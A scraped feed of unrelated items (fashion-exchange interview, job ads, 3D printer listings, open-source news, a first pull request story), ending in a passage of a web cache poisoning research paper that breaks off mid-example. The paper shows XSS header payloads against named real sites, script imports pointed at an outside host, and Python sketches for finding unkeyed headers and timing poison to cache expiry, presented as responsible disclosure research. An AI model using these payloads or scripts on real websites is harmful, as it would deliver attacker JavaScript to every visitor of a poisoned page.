Of course, in all markets, GFX considers what goes on culturally and socioeconomically before starting a swap. Bolivia, Costa Rica, Barcelona, etc. are all different, and in some, like India, second-hand clothing is not desirable. But GFX is fun and the experience is really key; a tool to show people that this is great. The quality of the clothing is just as important, as are the marketing and branding.

When doing a swap for the first time, storytelling is important and we do a lot of coaching for the ambassadors to bring influential people to the table. In India, this was Evelyn Sharma, a famous Bollywood actress who also has her own organisation, Seams for Dreams. The organisation provides appropriate clothing to the less privileged members of society in India and raises funds and awareness through fashion events. It really helps when GFX is endorsed by someone else. Evelyn was not just a face but doing something similar, which is related to the cause. This is important not only in India but all over the world. In India, we received such a positive response and great publicity that the local ambassador is creating more events.

What is your personal take-away from starting the Global Fashion Exchange?

Oh, I have learned so much and I have had wonderful teachers at the different organisations I have worked with. Over time, I also got invited to talk at conferences and I have spoken at the United Nations four times about GFX. I was also at the Omina Fashion Summit and I gave the keynote address at the first Australian Circular Fashion Conference. People see me and they see that I’m just a normal person and that one person can change the world. Plus, people want to hear positive things, they don’t want to hear about the crazy problems that are happening. So there is no need to be banging on about the problems but to talk about the solutions. GFX becomes a solution or provides different solutions.

Tell us a bit about GFX Consulting.

GFX Consulting is part of a business model that developed out of my thought ‘how am I going to make this work? What am I going to do with all this knowledge?’ I wanted to keep it open source right from the beginning. And now I am teaching companies how to transform a supply chain and how to communicate it. This could be doing a big project with a major brand but also with small ones and exploring how to find funding, getting connected to different markets and communicating their story. Assessing different needs and building custom solutions, basically.

There is a lot of storytelling in marketing and brands are just starting to understand that telling the story of sustainability can be a big part of what they do. The people, the planet, the process. But often, brands are stuck in linear models or cycles whereas circularity is important and we can teach them how to transition.

In view of the recent scandal with brands destroying perfectly good stock, how do you sell circularity and sustainability to brands?

The biggest question is: Why are they burning all of this? That’s where you have to teach people: if you buy less, brands need to produce less. Because currently, what brands are doing is polluting the earth. So they have to innovate and take a look at what they’re doing. They have to focus on better quality but also circularity, creating products that are 100 percent circular. Brands have to become educators as well. They have to take responsibility alongside the consumer. Production has to slow down, as fast fashion is choking the industry. Innovative materials are key, for example those made out of ocean plastics. Luckily, sustainability is a trend and hopefully one that is going to last.

Photos: Global Fashion Exchange


          Clients - Coimbatore, Madras, India
Coimbatore, India At ThoughtWorks, testing (especially test automation and Agile testing) is central to our delivery methodology. ThoughtWorks has contributed significantly to Open Source testing tools, such as Sahi, Selenium and SharpRobo and we are at the forefront of automated testing practices. Our testing capability is amongst the most advanced in ..
          LXer: Strawberry: Quality sound, open source music player
Published at LXer: I recently received an email from Jonas Kvinge, who forked the Clementine open source music player. Jonas writes: … Read more at LXer.
          Google Boots Open Source Anti-Censorship Tool From Chrome Store

A browser extension that acted as an anti-censorship tool for 185,000 people has been kicked out of the Chrome store by Google. The open source Ahoy! tool facilitated access to more than 1,700 blocked sites but is now under threat. Despite several requests, Google has provided no reason for its decision.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.


          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          LulzBot Mini 2

SMALL SIZE, BIG CAPABILITIES

Major hardware improvements over the original LulzBot Mini include Einsy RAMBo electronics with Trinamic drivers for whisper-quiet operation and a build volume increase of approximately 20% with no increase in footprint.


BUT WAIT, THERE’S MORE

The Mini 2 features a belt-driven Z-axis which allows for rapid travel and accurate layer alignment, with no reduction in minimum resolution. Also included as standard equipment are three accessories previously offered as add-ons to the original LulzBot Mini: A next generation Tool Head designed around the E3D Titan Aero hot end and extruder, capable of printing both rigid and flexible filaments out of the box, the LulzBot modular bed system with reversible heated glass/PEI surface, and a Graphical LCD Controller for tetherless operation.


LIBRE INNOVATION

All LulzBot products use Free Software and are Open Source Hardware. This means your LulzBot Mini uses proven technology developed collaboratively. Cura LulzBot Edition version 3.2 software is now in a public beta phase, and is anticipated for a final release in advance of the first shipments of Mini 2 units. The update to Cura LE features faster load times, an updated interface, and a bevy of new slicing options.


DON'T FORGET TO BUY FILAMENT!

The LulzBot Mini 2 does not ship with filament, so make sure to order some with your purchase. We recommend PLA for beginners, but more advanced materials including heavy-duty options like nylon, PETG, and a variety of composites are available with preset profiles. With so many options, the choice is yours!


          Ultimaker Original+

Build knowledge while building your printer

The DIY kit allows the user to gain more understanding of how the printer functions, building the knowledge needed for any future upgrades or replacements before the first print has even been completed.


Not your average kit

Even though assembly is required, you can still expect the same phenomenal quality and speed as the assembled Ultimaker 2. Industry leading specifications like layer resolutions as fine as 20 microns and extrusion speeds up to 300mm/s yield high-quality prints.


Hot off the bed

The Original+ now includes a heated bed for smoother bottom layers, better adhesion, and ABS printing. Other included improvements are the UltiController user interface system, enhanced electronics for better temperature control, and a redesigned fan cap and feeder wheel for added safety.


Affordable and reliable

Replacement parts are available at a low cost. The reliable Original+ is low maintenance, and parts are easily interchangeable.


Tinker, share, and enhance

Open source files are available in the Ultimaker knowledge base. This encourages users to experiment, share ideas and knowledge, and work together to continue pushing the limits of what is possible.



          Racial Equity Toolkits–A Local Example

Last year our School of Social Work class, a service learning course with the Community Empowerment Fund, learned how to use a racial equity toolkit to assess 5 local community policies or programs and hopefully produce an analysis that was informative and useful to our elected officials. The topics were presented by the 4 local elected officials who were serving on the Leadership Team for the Orange County Partnership to End Homelessness: Kathleen Ferguson from the Hillsborough Board of Commissioners, Sally Greene from the Chapel Hill Town Council, Mark Marcoplos from the Board of County Commissioners, and Damon Seils from the Carrboro Board of Aldermen. They each suggested a policy or program in their jurisdictions that they felt could use analysis with a racial equity lens. Topics included Hillsborough’s clean energy resolution, Chapel Hill’s purchase of the American Legion property, redevelopment of the former Chapel Hill Town Hall, short range transit planning, and programming for Department of Social Services clients. We used a toolkit developed by the Seattle Office of Civil Rights and the Government Alliance on Race and Equity (GARE). The folks with GARE wanted to share our experience on their Race to Democracy website, “an open source campaign to build a more inclusive democracy that advances racial equity.” We worked with them to create a blog post on the analysis of the American Legion property. 

You can read the post here

The full report is available here.

And stay tuned, we’ll be doing another set of racial equity analyses for our community in our course this fall!


          JAVA AND OPEN SOURCE DEVELOPER HASSELT - Xplore Group - Kontich
Preferably you have obtained a bachelor's or master's degree, or completed training as a Java programmer at the VDAB....
From Bonque - Sat, 28 Jul 2018 10:43:02 GMT - View all jobs in Kontich
          JAVA AND OPEN SOURCE DEVELOPER KONTICH (Antwerpen) - Xplore Group - Kontich
Preferably you have obtained a bachelor's or master's degree, or completed training as a Java programmer at the VDAB....
From Bonque - Sat, 28 Jul 2018 10:43:03 GMT - View all jobs in Kontich
          JAVA AND OPEN SOURCE DEVELOPER MERELBEKE (GENT) - Xplore Group - Kontich
Preferably you have obtained a bachelor's or master's degree, or completed training as a Java programmer at the VDAB....
From Bonque - Sat, 28 Jul 2018 10:43:03 GMT - View all jobs in Kontich
          VIDEO: Chief Obi – Kweku
About Us: Welcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          Ayo Jay – Let Him Go
About Us: Welcome to Jaguda (JaH-GooD’-AH), your global open source medium that utilizes credible sources to keep you informed. Utilizing innovative technology, visual documentaries, and blogging
          BlackHat USA 2018 | Day 2 Talk Highlights

BlackHat USA 2018 | Day 2 Talk Highlights

Black Hat official website: https://www.blackhat.com/

About the Conference

As the premier event of the global information security industry, Black Hat has a long history and is now in its 21st year. Talk selection for each conference is extremely strict: the acceptance rate for submissions is under 20 percent, which is why Black Hat is also known as the most technical information security conference.

For this year's Black Hat, Anquanke has invited many security experts attending the conference to share the highlights of the talks they see, live from the venue.

Dates: August 8-9, 2018
Talk briefings - Day 2, first half
Stop that Release, There's a Vulnerability!

Speaker: Christine Gadsby | Director, Product Security Operations, BlackBerry

Time: 9:00-9:25

Tags: Security Development Lifecycle, Enterprise

Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes with tight release timelines or no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public or vulnerabilities found within internally written code can challenge the best intentions of any SDLC.

How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it’s already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?

As a software developer, product owner, or business leader being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security fix pressure and expectations of immediate security fixes on tight timelines are becoming the norm.

This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they’ve spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software ‘security gate.’ Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.

Tips on how to document, prioritize, tag, and track security vulnerabilities, their fixes, and how to prioritize them into release targets

Features of common tools [JIRA, Bugzilla, and Excel] you may not know of and examples of simple automation you can use to verify ticket resolution.

A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.



          Oh, No, Not Another Security Product

Let's face it: There are too many proprietary software options. Addressing the problem will require a radical shift in focus.

Organizations and businesses of all types have poured money into cybersecurity following high-profile breaches in recent years. The cybercrime industry could be worth $6 trillion by 2022, according to some estimates, and investors think that there's money to be made. But like generals fighting their last battle, many investors are funding increasingly complex point solutions while buyers cry out for greater simplicity and flexibility.

Addressing this problem requires a radical shift in focus rather than a change of course. Vendors and investors need to look beyond money and consider the needs of end users.

More Money, More Problems

London's recent Infosecurity conference included more than 400 vendors exhibiting, while RSA in San Francisco boasted more than 600. And this only includes those with the marketing budgets and inclination to exhibit. One advisory firm claims to track 2,500 security startups, double the number of just a few years ago. Cheap money has created a raft of companies with little chance of IPO or acquisition, along with an even greater number of headaches for CISOs trying to make sense of everything.

The market is creaking from this trend, with Reuters reporting mergers and acquisitions down 30% in 2017, even as venture capital investment increased by 14%. But the real pain is being felt by CISOs trying to integrate upward of 80 security solutions in their cyber defenses, as well as overworked analysts struggling to keep up. The influx of cash also has caused marketing budgets to spike, leading to a market in which it is deemed acceptable for increasingly esoteric products to be promoted to CISOs as curing everything.

All of this feeds into a sense of "product fatigue" where buyers are frightened into paying for the latest black box solution, only to see their blood pressure spike when they find that they don't have the necessary resources to deploy or support these tools. This situation does not benefit any of the parties ― the overwhelmed CISO, the overly optimistic investors, or the increasingly desperate vendors caught in limbo between funding rounds when their concepts weren't fully baked to begin with.

Addressing complex modern threats calls for sophisticated tools and products, but we cannot fight complexity with complexity. Security operations center teams cannot dedicate finite analyst capacity to an ever-expanding battery of tools. Fragmentation within the security suite weakens company defenses and the industry as a whole, and the drain on analysts' time detracts from crucial areas such as basic resilience and security hygiene.

Platforms, Not Products

The industry doesn't need more products, companies, or marketing hype. We need an overhaul of the whole approach to security solutions, not an improvement of components. Security should be built on platforms with a plug-and-play infrastructure that better supports buyers, connecting products in a way that isn't currently possible.

Such platforms should be flexible and adaptable, rewarding vendor interoperability while punishing niche solutions that cannot be easily adopted. This would lead to collaboration within the industry and create a focus on results for end users, rather than increasingly blinkered product road maps. Such platforms could act as a magnifying glass for innovation, providing a sandbox to benchmark new technologies and creating de facto security standards in the process.

This move from proprietary architecture to open modular architecture is a hallmark of Clayton Christensen's disruptive innovation theory, and it is long overdue within the security industry. Buyers will have greater control of their tech stacks, while vendors and investors will get to proof-of-concept faster, and see greater efficiency within the market.

One example of such a platform is Apache Metron, an open source security platform that emerged from Cisco. Metron has been adopted by a number of major security providers and provides a glimpse of what the future of security should look like.

Collaborating, creating industry standards, or making technologies open source does not mean that vendors can't make money; in fact, the reverse is true. Customers will be more willing to invest in security solutions that they know are future-proofed, that don't come with the dreaded "vendor lock-in," and that simplify rather than further complicate their architecture.

Like all of security, there are varying degrees of risk and reward, but this approach is starting to look like the only logical future in an increasingly frothy, confusing, and low return-on-investment field. There will be a correction in the security market, whether it is in a month or a year. The fundamentals that will cause this are already evident, so there is an excellent opportunity to learn the lessons in advance and minimize the pain by contributing toward the platforms of the future.

Related Content:
10 Open Source Security Tools You Should Know
Secure Code: You Are the Solution to Open Source's Biggest Problem
The Good News about Cross-Domain Identity Management


Paul Stokes has spent the last decade launching, growing, and successfully exiting security and analytics technology companies. He was the co-founder and CEO of Cognevo, a market-leading security analytics software business that was acquired by Telstra Corporation. Prior to ...


          Supercopier 1.4.1.0
Supercopier is a file management tool that allows you to quickly and easily move, transfer or copy files. It was designed as a replacement for the standard Windows file copy dialogs and allows you to make large transfers at once with many options. [License: Open Source | Requires: Win 10 / 8 / 7 / Vista / XP | Size: 6.42 MB+ ]
          This Week in Data with Colin Charles 48: Coinbase Powered by MongoDB and Prometheus Graduates in the CNCF
Colin Charles

Join Percona Chief Evangelist Colin Charles as he covers happenings, gives pointers and provides musings on the open source database community. The call for submitting a talk to Percona Live Europe 2018 is closing today, and while there may be a short extension, have you already got your talk submitted? I suggest doing so ASAP! […]

The post This Week in Data with Colin Charles 48: Coinbase Powered by MongoDB and Prometheus Graduates in the CNCF appeared first on Percona Database Performance Blog.


          The Linux Foundation Announces Keynote Speakers For All New Open FinTech Forum To Explore The Intersection Of Financial Services And Open Source
The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the keynote speakers for Open FinTech Forum, taking place October 10-11 in New York.
          WhiteSource Launches Free Open Source Vulnerability Checking

WhiteSource, an open source security and license compliance management solution provider, has launched Vulnerability Checker, a new, free and standalone CLI tool that provides alerts on critical open source vulnerabilities.

By Helen Beal
          Designer UX - UI

Kaliop Canada Inc. / Montreal

Company description
The Kaliop group is an international network of digital experts skilled in the design, development and operation of complex multi-platform, multi-language, multi-location projects. With offices in Montpellier, Paris and London, as well as Montreal and Poland, Kaliop is today a specialist in open source technologies, internationally recognized and regularly awarded for its work.



          Updated ZenTao to 10.3
ZenTao (ID : 559) package has been updated to version 10.3. ZenTao is a leading open source project management software that offers lifetime free upgrades and focuses on software development project management, supporting story management, sprints and tasks, bug tracking, Scrum, Waterfall, roadmaps and self-hosting - your free project management tool! Review, Rate and View Demo of … Continue reading "Updated ZenTao to 10.3"
          Amazon launches new SDK to bring the Alexa assistant to more cars

This week, Amazon released an open source version of the Alexa Automotive Core SDK, called the Auto SDK. The idea is that, with it, automakers can integrate the company's voice assistant into an even greater number of cars.

The development kit is free to download and available on GitHub, and is optimized to bring Alexa to vehicle dashboards. With it, drivers can invoke the assistant through voice commands to perform tasks such as playing music, providing traffic directions and making phone calls.

The Auto SDK also brings to cars some Alexa features that, until now, were available only on smart speakers, such as remotely controlling home devices and checking the weather, among others.

Automakers such as Ford and Toyota have already brought Alexa to some of their most popular models; Amazon's assistant is also present in vehicles from Mercedes-Benz, Hyundai and General Motors. With the new SDK, however, the assistant will be able to perform an even greater number of functions.


          Comment on Silencing Alex . . . For Openers by ReadyKilowatt
Competition is coming. The cellular industry is just about ready to roll out 5G LTE. One of the big pushes is to have fixed-point wireless services to the home using 24GHz spectrum. While it might not be the libertarian panacea where anyone who wants to can be an ISP, it will break the monopoly/duopoly of wired services, if only because the carriers already have the back office in place to process payments, send equipment out to customers, etc. And it's a new incremental revenue stream, so they can let it flounder for a few years.

As for Facebag and Twacker, listen to Tom Woods' podcast episode 1212. I'm not a fan of Michael Malice but he has several good points. We will probably see an end to, or at least a great reduction in users of, Facebook and Twitter as new platforms are rolled out. Heck, we already have people on multiple platforms because of Linkedin for work and Facebook for friends.

Mastodon is an interesting alternative to Twitter but has yet to gain much traction. I could see where different groups (a religion or hobby association for example) might set up a Mastodon server for their people to use. The interesting thing about Mastodon is the idea of federation, where servers are cross connected and so you can have both local and global message timelines. https://noagendasocial.com/web/getting-started is a Mastodon server for the No Agenda podcast. Oh, and it's all open source: https://github.com/tootsuite/mastodon

https://tomwoods.com/ep-1212-michael-malice-on-social-media-alex-jones-and-whats-coming-next/
          My First Pull Request

I still remember how hard it was to open my first pull request, but when I eventually did, it became probably one of the most rewarding things I’ve done. I wanted to share my story, in the hope of helping people getting over the first mental hurdle.

@andrew built this handy tool – firstpr.me, for looking up your first public pull request, and mine was to Bootstrap!

My first pull request as found on http://firstpr.me/#muan


At the time, I was working in a 4-person startup where I was a designer and front-end developer. We weren’t using the GitHub flow, instead we mainly just rebased all the things. Therefore I wasn’t familiar with branching or the GitHub UI, I didn’t even visit github.com for work, let alone participate in the open source community.

We wanted all of our app’s right-hand side tooltips to be one line, despite their length, so I added a workaround to override the max-width Bootstrap sets by default:

.tooltip.right .tooltip-inner {
  max-width: none;
}

It did kind of help, but then some of the tooltips became mispositioned. The problematic tooltips were the ones longer than the default, while the short ones were fine. After a bit of digging I kind of decided that this bug lies within Bootstrap.

But, what’s the possibility of :crown: the authors of Bootstrap :crown: not knowing this already? Or that they did this intentionally? They know their shit, and do I?… well definitely not as much. I must have missed something, right?

I was putting off fixing this bug because I wasn’t 100% sure if it was me who added a bad fix – and sadly I didn’t know how else to achieve what we wanted, or if there was actually something wrong in Bootstrap.

The bug felt bigger than me, because it was in the ever so popular Twitter Bootstrap, what can I do about it? I’m not that good, certainly not Bootstrap contributors good, right?

At the same time I was getting pressure from my boss – why is this bug not fixed already? And after a bit of discussions, it turned out that my boss had the same concern, “how is it possible that you found a bug in Bootstrap?” and that got me riled up.

I wasn’t stupid, I knew the code, I doubted myself indeed, but that was a confidence thing. Judging the evidence rationally, I had to be right!

Having another person also doubt my debugging outcome made me angry, and I wanted to stand up for myself. It was silly really, I was doing the exact same thing to myself, but I didn’t feel it.

So, I got the courage and opened up the pull request on Bootstrap, as you can see on twbs/bootstrap#6703. The fix was dead simple, but I still probably rewrote the PR body and redid the example tens of times. The jsbin URL was at the 10th revision! I read so many other pull requests trying to spot common mistakes, and thought I had covered them all, but as it turned out I missed one important thing – CONTRIBUTING.md. It said you’d need to add tests and compile the code, so accordingly my pull request was closed by @fat, asking for a test.

OK, it was a setback, but that didn’t mean I was wrong, I just missed something. I wasn’t going to give up that easily.

I got back up, read through the contribution guidelines, combed through the unit test code, learned how to test JavaScript and compile my code, I opened another pull request: twbs/bootstrap#7327, and I waited.

It got merged 4 months later, though I’d already left the startup, it – still – felt – hella – good.

I WON! :trophy:


From the time of my first pull request, to the time that the second pull request got merged, a lot had happened.

I stopped being afraid of GitHub and started putting all the things online. I put up my first real open source project (and got to experience getting lots of issues rather than pull requests!). I also made a popular (in Taiwan) generator game in collaboration with an illustrator friend of mine, and had to make the repository private overnight because he started making a lot of money off of it.

Finally, and most amazingly, I also started interviewing at GitHub. During the interview process, the most memorable part was getting an email from @mdo, and hearing him say in FaceTime: “I saw your pull request, and thought holy shit that’s muan! I recognize her!” :heart_eyes:


I wouldn’t be here if not for having that courage to open the first pull request.

I used to think I was really far from this world of people worthy and capable of coding and collaborating in the open, but I was not, and no one is, ever. To not have participated would have been a huge loss for me.


What’s your first pull request? Would you share your story? If/when you do, please do let me know, and I will include them here.


          Arduino: The Beauty Behind the Software
Are you trying to find temperature software that’s easy to customize and develop? Learn how Arduino does this in this guide.   What is Arduino? Arduino is defined by its creator as an open source electronic board. What makes this […]
          LHS Episode #240: The Weekender XIV

Hello and welcome to the 240th episode of Linux in the Ham Shack. In this episode, we outline some of the great amateur radio contests and special events, open source events and distributions, and wine, food and song you can partake of in the next fortnight. Oh no, I said fortnight. Get out there and [...]


          OTTO: A Pi Based Open Source Music Production Box

Want an open source portable synth workstation that won’t break the bank? Check out OTTO. [Topisani] started OTTO as a clone of the well-known Teenage Engineering OP-1. However, soon [Topisani] decided to branch away from simply cloning the OP-1 — instead, they’re taking a lot of inspiration from it in terms of form factor, but the UI will eventually be quite different.

On the hardware side, the heart of the OTTO is a Raspberry Pi 3. The all-important audio interface is a Fe-Pi Audio Z V2, though a USB interface can be used. The 48 switches and four rotary encoders …


          Hollywood gets its own open source foundation
Open source is everywhere now, so maybe it’s no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) today announced that it has partnered with the Linux Foundation to launch the Academy Software Foundation, a new open source foundation for developers in the motion picture and media space. […]
          PostgreSQL 10.4
PostgreSQL is a powerful, open source object-relational database system. It has more than 15 years of active development and a proven architecture that has earned it a strong reputation for reliability, data integrity, and correctness. It is fully A...
          Practical Web Cache Poisoning


Abstract

Web cache poisoning has long been an elusive vulnerability, a 'theoretical' threat used mostly to scare developers into obediently patching issues that nobody could actually exploit.

In this paper I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.

I'll illustrate and develop this technique with vulnerabilities that handed me control over numerous popular websites and frameworks, progressing from simple single-request attacks to intricate exploit chains that hijack JavaScript, pivot across cache layers, subvert social media and misdirect cloud services. I'll wrap up by discussing defense against cache poisoning, and releasing the open source Burp Suite Community extension that fueled this research.

This post is also available as a printable whitepaper, and it accompanies my Black Hat USA presentation so slides and a video will become available in due course.

Core Concepts

Caching 101

To grasp cache poisoning, we'll need to take a quick look at the fundamentals of caching. Web caches sit between the user and the application server, where they save and serve copies of certain responses. In the diagram below, we can see three users fetching the same resource one after the other:

[Diagram: three users fetching the same resource through a shared web cache]

Caching is intended to speed up page loads by reducing latency, and also reduce load on the application server. Some companies host their own cache using software like Varnish, and others opt to rely on a Content Delivery Network (CDN) like Cloudflare, with caches scattered across geographical locations. Also, some popular web applications and frameworks like Drupal have a built-in cache.

There are also other types of cache, such as client-side browser caches and DNS caches, but they're not the focus of this research.

Cache keys

The concept of caching might sound clean and simple, but it hides some risky assumptions. Whenever a cache receives a request for a resource, it needs to decide whether it has a copy of this exact resource already saved and can reply with that, or if it needs to forward the request to the application server.

Identifying whether two requests are trying to load the same resource can be tricky; requiring that the requests match byte-for-byte is utterly ineffective, as HTTP requests are full of inconsequential data, such as the requester's browser:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Accept: */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Cookie: jessionid=xyz;
Connection: close

Caches tackle this problem using the concept of cache keys – a few specific components of a HTTP request that are taken to fully identify the resource being requested. In the request above, I've highlighted the values included in a typical cache key in orange.

This means that caches think the following two requests are equivalent, and will happily respond to the second request with a response cached from the first:

GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=pl;
Connection: close
GET /blog/post.php?mobile=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 … Firefox/57.0
Cookie: language=en;
Connection: close

As a result, the page will be served in the wrong language to the second visitor. This hints at the problem – any difference in the response triggered by an unkeyed input may be stored and served to other users. In theory, sites can use the 'Vary' response header to specify additional request headers that should be keyed. In practice, the Vary header is only used in a rudimentary way, CDNs like Cloudflare ignore it outright, and people don't even realise their application supports any header-based input.
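
To make the keying behaviour concrete, here's a minimal sketch of the lookup a naive cache performs (illustrative Python, not any particular cache's real implementation):

# Only the method, Host header and path/query form the key; anything else,
# including a header like X-Forwarded-Host, is invisible to the lookup.
cache = {}

def cache_key(request):
    return (request["method"], request["headers"].get("Host"), request["path"])

def handle(request, fetch_from_origin):
    key = cache_key(request)
    if key not in cache:
        cache[key] = fetch_from_origin(request)   # miss: store whatever the origin says
    return cache[key]                             # hit: replay the stored response

Two requests that differ only in an unkeyed header share one key, so the second visitor simply receives whatever response the first visitor's headers produced.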

This causes a healthy number of accidental breakages, but the fun really starts when someone intentionally sets out to exploit it.

Cache Poisoning

The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.

[Diagram: a poisoned response being saved by the cache and served to subsequent visitors]

In this paper, we're going to poison caches using unkeyed inputs like HTTP headers. This isn't the only way of poisoning caches - you can also use HTTP Response Splitting and Request Smuggling - but I think it's the best. Please note that web caches also enable a different type of attack called Web Cache Deception which should not be confused with cache poisoning.

Methodology

We'll use the following methodology to find cache poisoning vulnerabilities:

[Diagram: cache poisoning methodology flowchart]

Rather than attempt to explain this in depth upfront, I'll give a quick overview then demonstrate it being applied to real websites.

The first step is to identify unkeyed inputs. Doing this manually is tedious so I've developed an open source Burp Suite extension called Param Miner that automates this step by guessing header/cookie names, and observing whether they have an effect on the application's response.
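
The core of that guessing loop is simple enough to sketch; the candidate list and fetch helper below are illustrative stand-ins, and Param Miner's real wordlists and response diffing are considerably more thorough:

import urllib.request

CANDIDATE_HEADERS = ["X-Forwarded-Host", "X-Forwarded-Scheme", "X-Host"]  # sample guesses

def fetch(url, headers):
    request = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(request) as response:
        return response.read()

def find_unkeyed_inputs(url):
    baseline = fetch(url, {})
    found = []
    for name in CANDIDATE_HEADERS:
        probe = fetch(url, {name: "canary123"})
        # Naive comparison; real tooling diffs carefully to ignore dynamic content.
        if b"canary123" in probe or probe != baseline:
            found.append(name)
    return found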

After finding an unkeyed input, the next steps are to assess how much damage you can do with it, then try and get it stored in the cache. If that fails, you'll need to gain a better understanding of how the cache works and hunt down a cacheable target page before retrying. Whether a page gets cached may be based on a variety of factors including the file extension, content-type, route, status code, and response headers.
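
A quick way to sketch that "did it stick?" check: seed the cache with the payload, then re-request the same cache key with benign headers and see whether the reflection persists (the fetch helper is an assumption carried over from the sketch above):

def confirm_cached(fetch, url, header_name, marker="canary123"):
    fetch(url, {header_name: marker})   # attempt to seed the cache entry
    benign = fetch(url, {})             # same cache key, no malicious header
    return marker.encode() in benign    # marker still present => response was cached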

Cached responses can mask unkeyed inputs, so if you're trying to manually detect or explore unkeyed inputs, a cache-buster is crucial. If you have Param Miner loaded, you can ensure every request has a unique cache key by adding a parameter with a value of $randomplz to the query string.

When auditing a live website, accidentally poisoning other visitors is a perpetual hazard. Param Miner mitigates this by adding a cache buster to all outbound requests from Burp. This cache buster has a fixed value so you can observe caching behaviour yourself without it affecting other users.
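
As a sketch, a cache buster is nothing more than a throwaway query parameter, assuming the target keys on the full query string; a unique value isolates every probe, while a fixed value lets you study caching behaviour without touching other visitors' entries:

import secrets

def with_cache_buster(url, fixed=None):
    value = fixed if fixed is not None else secrets.token_hex(8)
    separator = "&" if "?" in url else "?"
    return f"{url}{separator}cb={value}"   # the parameter name 'cb' is arbitrary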

Case Studies

Let's take a look at what happens when the methodology is applied to real websites. As usual, I've exclusively targeted sites with researcher-friendly security policies. All the vulnerabilities discussed here have been reported and patched, although due to 'private' programs I've unfortunately been forced to redact a few.

Many of these case studies exploit secondary vulnerabilities such as XSS in the unkeyed input, and it's important to remember that without cache poisoning, such vulnerabilities are useless as there's no reliable way to force another user to send a custom header on a cross-domain request. That's probably why they were so easy to find.

Basic Poisoning

In spite of its fearsome reputation, cache poisoning is often very easy to exploit. To get started, let's take a look at Red Hat's homepage. Param Miner immediately spotted an unkeyed input:

GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.png" />

Here we can see that the X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag. The next step is to explore whether it's exploitable – we'll start with a simple cross-site scripting payload:

GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>

HTTP/1.1 200 OK
Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

Looks good – we've just confirmed that we can cause a response that will execute arbitrary JavaScript against whoever views it. The final step is to check if this response has been stored in a cache so that it'll be delivered to other users. Don't let the 'Cache-Control: no-cache' header dissuade you – it's always better to attempt an attack than assume it won't work. You can verify first by resending the request without the malicious header, and then by fetching the URL directly in a browser on a different machine:

GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com

HTTP/1.1 200 OK

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

That was easy. Although the response doesn't have any headers that suggest a cache is present, our exploit has clearly been cached. A quick DNS lookup offers an explanation – www.redhat.com is a CNAME to www.redhat.com.edgekey.net, indicating that it's using Akamai's CDN.

Discreet poisoning

At this point we've proven the attack is possible by poisoning https://www.redhat.com/en?dontpoisoneveryone=1 to avoid affecting the site's actual visitors. In order to actually poison the blog's homepage and deliver our exploit to all subsequent visitors, we'd need to ensure we sent the first request to the homepage after the cached response expired.

This could be attempted using a tool like Burp Intruder or a custom script to send a large number of requests, but such a traffic-heavy approach is hardly subtle. An attacker could potentially avoid this problem by reverse engineering the target's cache expiry system and predicting exact expiry times by perusing documentation and monitoring the site over time, but that sounds distinctly like hard work.

Luckily, many websites make our life easier. Take this cache poisoning vulnerability in unity3d.com:

GET / HTTP/1.1
Host: unity3d.com
X-Host: portswigger-labs.net

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

<script src="https://portswigger-labs.net/sites/files/foo.js"></script>

We have an unkeyed input - the X-Host header – being used to generate a script import. The response headers 'Age' and 'max-age' respectively specify the age of the current response, and the age at which it will expire. Taken together, these tell us the precise second we should send our payload to ensure our response gets cached.
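
A sketch of that timing calculation, assuming the response carries Age and Cache-Control: max-age headers as above (with Age: 174 and max-age=1800, the entry expires in 1,626 seconds):

import time

def seconds_until_expiry(headers):
    age = int(headers.get("Age", 0))
    max_age = 0
    for directive in headers.get("Cache-Control", "").split(","):
        directive = directive.strip()
        if directive.startswith("max-age="):
            max_age = int(directive.split("=", 1)[1])
    return max(max_age - age, 0)

def poison_on_expiry(headers, send_payload):
    time.sleep(seconds_until_expiry(headers))
    send_payload()   # the first request after expiry repopulates the cache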

Selective Poisoning

HTTP headers can provide other time-saving insights into the inner workings of caches. Take the following well-known website, which is using Fastly and sadly can't be named:

GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 … Firefox/60.0
